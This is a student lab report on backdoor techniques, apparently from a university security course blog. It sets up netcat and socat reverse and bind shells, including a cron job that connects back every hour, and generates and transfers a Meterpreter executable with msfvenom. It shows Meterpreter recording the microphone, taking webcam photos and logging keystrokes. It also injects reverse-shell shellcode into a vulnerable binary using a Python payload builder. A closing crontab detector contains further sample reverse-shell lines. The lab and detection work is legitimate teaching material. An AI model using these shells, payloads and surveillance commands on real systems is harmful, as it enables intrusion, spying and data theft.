20174304 Wang Tianzheng, Exp2: Backdoor Principles and Practice (Network Countermeasure Technology)

I. Experiment objectives

1.1 Experiment requirements

  • Use nc to set up backdoor connections between Windows, Mac and Linux
  • Use of Meterpreter
  • Use of MSF post-exploitation modules

1.2 Experiment content

  • Use netcat to get a shell on the host, started by cron
  • Use socat to get a shell on the host, started by a scheduled task
  • Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, and run it to get a shell on the host
  • Use MSF meterpreter (or other software) to capture audio, camera and keystrokes on the target host, and attempt privilege escalation
  • Optional: use MSF to generate shellcode, inject it into the pwn1 binary from Exp1, and obtain a reverse-connect shell

II. Experiment preparation

2.1 Turn off the firewall

2.1.1 Host

Turn off the Windows firewall on the host.

2.1.2 Virtual machine

On Kali the firewall is managed with ufw. It is not installed by default, so install it first with apt-get install ufw; ufw disable turns the firewall off and ufw enable turns it back on.

Disabling both firewalls is what makes the listeners below reachable. Note the asymmetry: a reverse (connect-back) shell only needs an outbound connection, which most host firewalls allow by default, while a bind shell needs the inbound port to be open.

 

2.2 ncat & socat

nc, also known as netcat (ncat is the Nmap project's rewrite of it), is a low-level tool for sending and receiving raw TCP and UDP data. It is often used together with other tools and can serve as a backdoor. Linux and macOS usually ship with nc; on Windows it must be downloaded. The -e option used below (run a program with its stdin/stdout attached to the socket) exists in netcat-traditional and in ncat but was removed from netcat-openbsd; if nc -e is rejected, use ncat -e or socat's exec: address instead.

socat is a versatile network tool for Linux whose name stands for SOcket CAT. Its function is similar to netcat, but it relays between arbitrary address types (TCP, UDP, files, pipes, pty, exec), so it can be seen as an enhanced netcat.

2.2.1 Download ncat & socat on the host

Download the netcat and socat archives, unzip them into a suitable folder, and run ncat and socat.exe from cmd in that folder; if the usage prompt appears, the installation succeeded.

 

2.2.2 Windows obtains a Linux shell

Run ipconfig in cmd on the host to find the host's IP address.

The host IP address is 192.168.0.100.

Use ncat to listen on port 4304 of the host: ncat -l -p 4304

On Kali, connect back to port 4304 on the Windows side and hand it a shell: nc 192.168.0.100 4304 -e /bin/sh

Back in the host's cmd, type ls: Windows now has Kali's shell.

2.2.3 Linux obtains a Windows shell

Run ip addr in the Kali VM's terminal to find the VM's IP address.

The VM IP address is 192.168.124.129.

In the Kali VM's terminal, start listening: nc -l -p 4304

On the host, connect back to Kali's port 4304 and hand it cmd.exe: ncat -e cmd.exe 192.168.124.129 4304

Back in the VM, Linux has obtained the Windows shell.

 

2.2.4 nc data transfer

On Windows run the listener: ncat -l 4304 (listens on port 4304)

On Kali connect to port 4304: nc 192.168.0.100 4304

Whatever is typed in the host's cmd appears in the VM's terminal after Enter, and whatever is typed in the VM appears in cmd: a simple two-way chat.

2.2.5 Transfer files with ncat

On the host, listen on port 4304 and write whatever is received into 4304.txt: ncat -l 4304 > 4304.txt

On Kali, first create 4304.txt, then connect to port 4304 on Windows and send the file: nc 192.168.0.100 4304 < 4304.txt

nc gives no completion signal and no integrity check; the listener simply exits when the sender closes the connection. Compare hashes afterwards (sha256sum 4304.txt on Kali, certutil -hashfile 4304.txt SHA256 on Windows) to confirm the file arrived intact.

 

2.3 Meterpreter

Meterpreter is a backdoor program.

The traditional understanding is: someone writes a backdoor, and we make use of it.

Later some experts wanted to write a platform that generates backdoors.

On such a platform the basic functions of the backdoor, its extensions, the encoder, the target platform and the runtime parameters are all made into components or adjustable parameters.

Combining them as needed produces an executable. In Metasploit, msfvenom is that generator and Meterpreter is the in-memory payload it produces; the handler on the attacker's side (exploit/multi/handler) receives the connection.

 

III. Experiment process

3.1 Use netcat to get a shell on the host, started by cron

On Windows, open cmd and listen on port 4304: ncat.exe -l 4304

In the Kali VM's terminal, edit the scheduled tasks with crontab -e (crontab is the cron job table, -e means edit); choose the third editor from the list.

Add as the last line 30 * * * * /bin/netcat 192.168.0.100 4304 -e /bin/sh, i.e. at minute 30 of every hour Kali connects back to port 4304 on the Windows host and hands it a shell.

Save and exit; crontab -l confirms the entry was saved. When the time arrives, typing ls in cmd shows that the shell has been obtained. Two things to check if it does not: the path /bin/netcat must exist on the VM (which netcat nc ncat), and the listener must already be running at minute 30, because cron makes one connection attempt and a failed attempt is not retried until the next hour.

 

3.2 Use socat to get a shell on the host, started by a scheduled task

In Windows, open Control Panel -> System and Security -> Administrative Tools -> Task Scheduler, click Create Task, select the Triggers tab, click New, and set "Begin the task" to "On workstation lock".

In the Actions tab click New, select the path of socat.exe as the program/script, and fill the "Add arguments" field with tcp-listen:4304 exec:cmd.exe,pty,stderr. This command binds cmd.exe to port 4304 and redirects cmd.exe's stderr to stdout. Click OK.

Then trigger the condition: press Win+L to lock the screen. A cmd window appears; do not close it. In Kali enter socat - tcp:192.168.0.100:4304, where the first argument - is standard input/output and the second connects to port 4304 on the Windows host. A cmd shell has now been obtained.

Unlike 3.1 this is a bind shell: socat listens on 4304 and anyone who can reach that port gets cmd.exe running under the account of the user whose lock event triggered the task.

Back in the Task Scheduler Library, end the running task so it returns to the Ready state.

3.3 Use MSF meterpreter to generate an executable, transfer it to the host with ncat, and run it to get a shell on the host

In the Kali terminal run msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.124.129 LPORT=4304 -f exe > 20174304_backdoor.exe

When the command succeeds it produces the backdoor executable 20174304_backdoor.exe.

In the Windows command line, change to the ncat directory and run ncat.exe -l 4304 > 20174304_backdoor.exe; the host is now waiting to receive the file.

On Kali run nc 192.168.0.100 4304 < 20174304_backdoor.exe to send the newly generated file from Kali to the host. An unencoded msfvenom executable is reliably flagged by Windows Defender, so real-time protection must also be off on the host for this step, not only the firewall.

On Kali enter msfconsole to open the MSF console, then:

use exploit/multi/handler (the listener module)
set payload windows/meterpreter/reverse_tcp (the same payload used to generate the backdoor)
set LHOST 192.168.124.129 (Kali's IP, the same as specified when generating the backdoor)
set LPORT 4304 (the same port)

Finally enter exploit; setup is complete and the handler is listening.

Double-click 20174304_backdoor.exe to run it, then go back to the VM and run ipconfig in the session to verify that the VM has obtained the Windows shell.

 

3.4 Use MSF meterpreter to capture audio, camera and keystrokes on the target host, and attempt privilege escalation

3.4.1 The record_mic command records audio from the microphone

3.4.2 The webcam_snap command takes a photo with the camera

3.4.3 The screenshot command captures the screen

3.4.4 keyscan_start starts recording keystrokes; keyscan_dump reads the recorded keystrokes (only keystrokes typed after keyscan_start are captured)

3.4.5 The getuid command shows the current user; getsystem attempts privilege escalation

Error: privilege escalation failed in this environment

After searching online and referencing classmate Zhang Bo's blog, I got a basic understanding of the reason.

First enter msfconsole to get the MSF command line, then:

  Enter use exploit/multi/handler to load the multi/handler module

  Enter use exploit/windows/local/ask

  Enter set payload windows/meterpreter/reverse_tcp to specify the payload

  Enter set lhost 192.168.124.129

  Enter set filename win_update.exe

  Enter set session 1 to set the session number

  Enter options to view the current settings under windows/local/ask

Then enter exploit and run the generated file win_update.exe.

It still fails, and I could not find the reason.

3.5 Optional content: use MSF to generate shellcode, inject it into the pwn1 binary from Exp1, and obtain a reverse-connect shell

First, prepare the shellcode (a linux/x86/shell_reverse_tcp payload; the handler started in msfconsole below uses the matching LHOST and LPORT).

And change some settings.

Next, use perl to write the bytes to be fed into pwn4304 (filler, return address, shellcode) to a file:

perl -e 'print "A" x 32;print"\x**\x**\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_04

The two bytes \x**\x** are what we still have to determine: the low bytes of the return address, which must point at the start of the shellcode. Open a terminal and inject this attack buffer: (cat input_04; cat) | ./pwn4304

In another terminal, debug the running pwn4304 process with gdb:

1. Find the process ID of pwn4304 (for example with ps -ef | grep pwn4304)

Process ID: 1590

2. Start gdb and attach to the process (attach 1590)

3. Set a breakpoint and inspect the memory address of the injected buffer

The ret instruction to break on is at 0x080484ae.

Enter break *0x080484ae to set the breakpoint, press Enter in the other terminal so the program runs on to the breakpoint, then back in gdb enter info r esp to view the stack pointer.

esp is 0xffffd6ac. At the ret instruction esp points at the saved return address, so the shellcode starts 4 bytes above it, at 0xffffd6b0. That is the address the return address must be overwritten with, written little-endian as \xb0\xd6\xff\xff. This value is only valid with ASLR disabled and in the same environment, because environment variables and arguments shift the stack. Modify the input file accordingly:

perl -e 'print "A" x 32;print"\xb0\xd6\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_4304

After modifying the input for pwn4304, open msfconsole in another terminal and start the handler:

use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set lhost 127.0.0.1
set lport 4444 (both chosen to match what the shellcode was generated with)
show options
exploit

 

In the original terminal enter (cat input_4304; cat) | ./pwn4304 and press Enter; the handler at the other end receives the connection and a shell is obtained.
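To make explicit what the perl one-liner builds, and why the handler's LHOST and LPORT are fixed by the shellcode rather than chosen freely, here is an added Python example (not code from the original post). It assumes the layout used above: 32 filler bytes, then the saved return address, then the shellcode, with the shellcode bytes copied from the perl line. The reverse_tcp_target function assumes the specific msfvenom encoding visible in those bytes (mov eax, ~ip ; xor eax, -1 ; push eax ; push word port), which is how I read this shellcode; it is not a general shellcode decoder. The sled parameter is my addition, not part of the lab's payload.

```python
import re
import struct

# The shellcode from the perl line in 3.5 (linux/x86/shell_reverse_tcp), as hex.
SHELLCODE = bytes.fromhex(
    "31c031db31c931d2"                # xor eax,ebx,ecx,edx
    "66b86701b302b101cd80"            # socket(AF_INET, SOCK_STREAM, 0)   syscall 0x167
    "89c3"                            # ebx = socket fd
    "b880fffffe83f0ff50"              # eax = ~0x0100007f ; xor eax,-1 ; push eax  (127.0.0.1 without NUL bytes)
    "6668115c"                        # push word 0x5c11 (port 4444, network byte order)
    "666a02"                          # push word AF_INET
    "89e1b210"                        # ecx = &sockaddr ; edx = 16
    "31c066b86a01cd80"                # connect(fd, &sockaddr, 16)          syscall 0x16a
    "85c07524"                        # if connect failed: jump to exit
    "31c9b102"                        # ecx = 2
    "31c0b03fcd80"                    # dup2(fd, ecx)
    "4979f9"                          # dec ecx ; loop while ecx >= 0 (fds 2, 1, 0)
    "31c050682f2f7368682f62696e89e3"  # build "/bin//sh" on the stack, ebx -> it
    "31c931d2b00bcd80"                # execve("/bin//sh", NULL, NULL)
    "b30131c0b001cd80"                # exit(1)
)

PAD = 32  # filler bytes before the saved return address in pwn4304 ("A" x 32 in the perl line)


def build_payload(ret_addr, shellcode=SHELLCODE, pad=PAD, sled=0):
    """Filler + little-endian return address + optional NOP sled + shellcode.
    With sled=0 this is byte-for-byte what the perl one-liner writes."""
    return b"A" * pad + struct.pack("<I", ret_addr) + b"\x90" * sled + shellcode


def shellcode_start(esp_at_ret):
    """At the breakpoint on ret, esp points at the saved return address;
    the shellcode is the next thing on the stack."""
    return esp_at_ret + 4


def reverse_tcp_target(shellcode):
    """Recover LHOST/LPORT from the encoding used in this shellcode:
    mov eax, imm32 ; xor eax, 0xffffffff ; push eax ; push word imm16."""
    m = re.search(rb"\xb8(.{4})\x83\xf0\xff\x50\x66\x68(.{2})", shellcode, re.DOTALL)
    if not m:
        raise ValueError("not the shell_reverse_tcp layout this decoder expects")
    ip_le = struct.unpack("<I", m.group(1))[0] ^ 0xFFFFFFFF  # undo the xor
    host = ".".join(str(b) for b in struct.pack("<I", ip_le))  # in-memory order == dotted quad
    port = struct.unpack(">H", m.group(2))[0]  # pushed in network byte order
    return host, port


if __name__ == "__main__":
    esp = 0xFFFFD6AC  # value shown by `info r esp` at the ret breakpoint
    payload = build_payload(shellcode_start(esp))
    with open("input_4304", "wb") as f:
        f.write(payload)
    print("handler must listen on", reverse_tcp_target(SHELLCODE))
```

Because no NOP sled is used, the return address has to hit the first shellcode byte exactly; passing sled=N prepends N NOPs so the address only has to land somewhere inside the sled, which tolerates small stack shifts between the gdb session and the real run.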

 

IV. Reflection and summary

4.1 Answers to the basic questions

Give examples of ways a backdoor might get onto your system.

  Installing unsafe or pirated software, downloading files of unknown origin.

Give examples of ways a backdoor can be started (Windows and Linux).

       Windows: autostart, or disguised to lure the user into starting it.

       Linux: shellcode injection, crontab scheduled start.

Which Meterpreter features impressed you most?

  Using the host's microphone and camera, taking screenshots, obtaining keyboard input records, and privilege escalation.

How would you find out whether a backdoor has been installed on your system?

  Check for abnormally open ports; scan regularly with antivirus software; check Task Manager for abnormal processes; check for abnormal autostart programs, etc.
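The cron entry added in 3.1 is exactly the kind of persistence a defender looks for when answering the last question above. The following is an added Python example, not code from the original post: it parses crontab -l output (a constructed sample that includes the lab's own entry) and flags commands that hand a shell to a network connection, reporting the connect-back target. The indicator patterns and the other sample lines are my own choices.

```python
import re

# Constructed sample of `crontab -l` output. Line 4 is the entry added in 3.1.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/5 * * * * /home/kali/bin/backup.sh
30 * * * * /bin/netcat 192.168.0.100 4304 -e /bin/sh
@reboot /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/443 0>&1'
15 2 * * 1 socat tcp-connect:192.168.0.100:4304 exec:/bin/sh,pty,stderr
"""

# Each pattern matches one way of attaching a shell to a socket.
INDICATORS = [
    (re.compile(r"\s-e\s*/?bin/(?:ba)?sh\b"), "nc/ncat -e shell"),
    (re.compile(r"exec:[^,\s]*(?:cmd\.exe|/?bin/(?:ba)?sh)"), "socat exec: shell"),
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp reverse shell"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash on redirected fds"),
]
# IPv4 followed by a port, separated by space, colon or slash (nc, socat and /dev/tcp forms).
ADDR = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})[:\s/]+(\d{2,5})\b")


def parse_crontab(text):
    """Yield (schedule, command) for each job line; skips comments and blank lines.
    Handles both the five-field form and @reboot/@daily style schedules."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield sched, cmd


def find_shell_backdoors(text):
    """Return a list of suspicious jobs with schedule, command, connect target and reasons."""
    hits = []
    for sched, cmd in parse_crontab(text):
        reasons = [why for rx, why in INDICATORS if rx.search(cmd)]
        if not reasons:
            continue
        m = ADDR.search(cmd)
        hits.append({
            "schedule": sched,
            "command": cmd,
            "target": f"{m.group(1)}:{m.group(2)}" if m else None,
            "reasons": reasons,
        })
    return hits


if __name__ == "__main__":
    for hit in find_shell_backdoors(SAMPLE_CRONTAB):
        print(f"[{hit['schedule']}] -> {hit['target']}: {', '.join(hit['reasons'])}")
        print("   ", hit["command"])
```

Run it over crontab -l for every user as well as /etc/crontab and /etc/cron.d/*, since a user crontab is only one of the places cron reads. On Windows the equivalent check for the task created in 3.2 is reviewing schtasks /query /fo LIST /v for actions that run socat.exe or ncat with exec: or -e arguments.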

4.2 Summary and experience

This experiment was simpler than the previous ones; it only needed a few short, consecutive commands. The privilege escalation part and the optional content were quite difficult and took a long time; I read a lot of people's blogs and was rather reluctant to do them, especially the last two steps, which I did many, many times. For the privilege escalation in section four I followed classmate Zhang Bo's blog and did it again, but still got stuck at the final step; I read online that this cannot be done on Win10, but I do not know whether that is true. The optional content needed knowledge from the previous experiment, so it was also a chance to review and consolidate what I had learned there, and as in the final step of that experiment, after doing it many times segmentation faults still happened often; restarting after a while fixed it. The biggest gain was realising that even with the firewall off this was still so hard for me, so the hackers must be very strong to attack so easily through backdoor vulnerabilities. It also reminds us to be security conscious, scan for viruses regularly, fix vulnerabilities, and never open unsafe things. I hope to learn more knowledge and methods for defending against backdoors and patching vulnerabilities.


Origin www.cnblogs.com/wtz0409/p/12533205.html